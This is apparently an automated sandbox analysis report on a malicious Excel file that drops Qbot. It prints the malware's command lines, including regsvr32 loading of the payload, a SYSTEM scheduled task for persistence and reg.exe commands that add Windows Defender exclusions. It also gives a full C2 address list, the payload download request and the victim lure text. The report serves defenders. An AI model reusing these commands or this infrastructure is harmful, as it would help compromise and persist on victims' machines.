Play interactive tour

Edit tour

Windows Analysis Report xls.xls

Overview

General Information

Sample Name:	xls.xls
Analysis ID:	492442
MD5:	170b6a83db1f64901d186eda31962306
SHA1:	9dedf1b8c2af2ea202b62b8c8a07a314f56ca6d5
SHA256:	7afc98f96efa95af64e356e7857d7db38e9d2eb9a0b8cab36acc7f8b96b7f978
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0 Qbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Qbot

Multi AV Scanner detection for submitted file

Document exploit detected (drops PE files)

Sigma detected: Schedule system process

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Office process drops PE file

Writes to foreign memory regions

Uses cmd line tools excessively to alter registry or file data

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory in foreign processes

Injects code into the Windows Explorer (explorer.exe)

PE file has nameless sections

Sigma detected: Regsvr32 Command Line Without DLL

Machine Learning detection for dropped file

Drops PE files to the user root directory

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Uses schtasks.exe or at.exe to add and modify task schedules

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

PE file does not import any functions

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Uses reg.exe to modify the Windows registry

Document contains embedded VBA macros

Drops PE files to the user directory

Dropped file seen in connection with other malware

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 2784 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1176 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 1016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

schtasks.exe (PID: 2556 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

regsvr32.exe (PID: 1832 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2520 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 3020 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2936 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

explorer.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

reg.exe (PID: 840 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ofsugluhreiu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

reg.exe (PID: 2068 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Csbfke' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)

regsvr32.exe (PID: 916 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2652 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)

cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama104", "Campaign": "1632729661", "Version": "402.343", "C2 list": ["95.77.223.148:443", "47.22.148.6:443", "89.101.97.139:443", "27.223.92.142:995", "120.151.47.189:443", "136.232.34.70:443", "120.150.218.241:995", "185.250.148.74:443", "181.118.183.94:443", "140.82.49.12:443", "67.165.206.193:993", "103.148.120.144:443", "71.74.12.34:443", "76.25.142.196:443", "73.151.236.31:443", "173.21.10.71:2222", "75.188.35.168:443", "2.178.88.145:61202", "71.80.168.245:443", "45.46.53.140:2222", "109.12.111.14:443", "105.198.236.99:443", "73.77.87.137:443", "41.248.239.221:995", "182.176.112.182:443", "96.37.113.36:993", "75.66.88.33:443", "162.244.227.34:443", "24.229.150.54:995", "216.201.162.158:443", "92.59.35.196:2222", "196.218.227.241:995", "24.139.72.117:443", "68.207.102.78:443", "72.252.201.69:443", "2.188.27.77:443", "177.130.82.197:2222", "68.204.7.158:443", "189.210.115.207:443", "181.163.96.53:443", "24.55.112.61:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443", "24.152.219.253:995", "50.29.166.232:995"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
xls.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.635284743.0000000000300000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000006.00000002.619249193.00000000003B0000.00000004.00000001.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.explorer.exe.80000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.regsvr32.exe.3b0000.1.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.explorer.exe.c0000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
6.2.regsvr32.exe.3b0000.1.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
7.2.explorer.exe.80000.0.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
14.2.explorer.exe.c0000.0.raw.unpack	JoeSecurity_Qbot_1	Yara detected Qbot	Joe Security
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 508, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 2784

Sigma detected: Regsvr32 Command Line Without DLL

Show sources

Source: Process started

Author: Florian Roth: Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 2784, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1176

Persistence and Installation Behavior:

Sigma detected: Schedule system process

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 1016, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn mywmprn /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:03 /ET 18:15, ProcessId: 2556

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 14.2.explorer.exe.c0000.0.unpack

Malware Configuration Extractor: Qbot {"Bot id": "obama104", "Campaign": "1632729661", "Version": "402.343", "C2 list": ["95.77.223.148:443", "47.22.148.6:443", "89.101.97.139:443", "27.223.92.142:995", "120.151.47.189:443", "136.232.34.70:443", "120.150.218.241:995", "185.250.148.74:443", "181.118.183.94:443", "140.82.49.12:443", "67.165.206.193:993", "103.148.120.144:443", "71.74.12.34:443", "76.25.142.196:443", "73.151.236.31:443", "173.21.10.71:2222", "75.188.35.168:443", "2.178.88.145:61202", "71.80.168.245:443", "45.46.53.140:2222", "109.12.111.14:443", "105.198.236.99:443", "73.77.87.137:443", "41.248.239.221:995", "182.176.112.182:443", "96.37.113.36:993", "75.66.88.33:443", "162.244.227.34:443", "24.229.150.54:995", "216.201.162.158:443", "92.59.35.196:2222", "196.218.227.241:995", "24.139.72.117:443", "68.207.102.78:443", "72.252.201.69:443", "2.188.27.77:443", "177.130.82.197:2222", "68.204.7.158:443", "189.210.115.207:443", "181.163.96.53:443", "24.55.112.61:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443", "24.152.219.253:995", "50.29.166.232:995"]}

Multi AV Scanner detection for submitted file

Show sources

Source: xls.xls

Virustotal: Detection: 30%

Perma Link

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: amstream.pdb source: explorer.exe, 00000007.00000003.622662373.0000000002781000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,	6_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,	7_2_0008AEB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,	13_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,	14_2_000CAEB4

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: 44467.7495993056[1].dat.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 28 Sep 2021 16:00:02 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44467.7495993056.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /44467.7495993056.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.14.37.178

Source: explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.623444753.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.619701962.0000000001D20000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.624053267.0000000001C80000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.624752810.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.638759143.00000000009E0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.620761307.0000000002220000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.888614780.0000000002030000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat

Jump to behavior

Source: global traffic

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
Source: Screenshot number: 4	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
Source: Screenshot number: 4	Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
Source: Document image extraction number: 0	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
Source: Document image extraction number: 0	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 0	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
Source: Document image extraction number: 1	Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
Source: Document image extraction number: 1	Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
Source: Document image extraction number: 1	Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\Drezd.red
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.7495993056[1].dat			Jump to dropped file

PE file has nameless sections

Show sources

Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: 44467.7495993056[1].dat.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.0.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.7.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name:
Source: Drezd.red.14.dr	Static PE information: section name:

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019242A	6_2_0019242A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191424	6_2_00191424
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193726	6_2_00193726
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00192C41	6_2_00192C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00194495	6_2_00194495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0019B114	6_2_0019B114
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191D89	6_2_00191D89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191000	6_2_00191000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191827	6_2_00191827
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_001934DA	6_2_001934DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00191C5D	6_2_00191C5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00193073	6_2_00193073
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_001932EB	6_2_001932EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_00194162	6_2_00194162
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10016EB0	6_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10012346	6_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10011758	6_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_10014FC0	6_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00096EB0	7_2_00096EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00092346	7_2_00092346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00091758	7_2_00091758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 7_2_00094FC0	7_2_00094FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A242A	13_2_001A242A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A3726	13_2_001A3726
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A1424	13_2_001A1424
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A2C41	13_2_001A2C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001AB114	13_2_001AB114
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A4495	13_2_001A4495
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A1D89	13_2_001A1D89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A1000	13_2_001A1000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A1827	13_2_001A1827
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A34DA	13_2_001A34DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A1C5D	13_2_001A1C5D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A3073	13_2_001A3073
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A32EB	13_2_001A32EB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_001A4162	13_2_001A4162
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10016EB0	13_2_10016EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10012346	13_2_10012346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10011758	13_2_10011758
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_10014FC0	13_2_10014FC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000D6EB0	14_2_000D6EB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000D2346	14_2_000D2346
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000D1758	14_2_000D1758
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_000D4FC0	14_2_000D4FC0

Source: xls.xls	OLE, VBA macro line: Sub auto_open()
Source: xls.xls	OLE, VBA macro line: Sub auto_close()
Source: xls.xls	OLE, VBA macro line: Private m_openAlreadyRan As Boolean
Source: xls.xls	OLE, VBA macro line: Private Sub saWorkbook_Opensa()

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,	6_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,	6_2_1000CB77
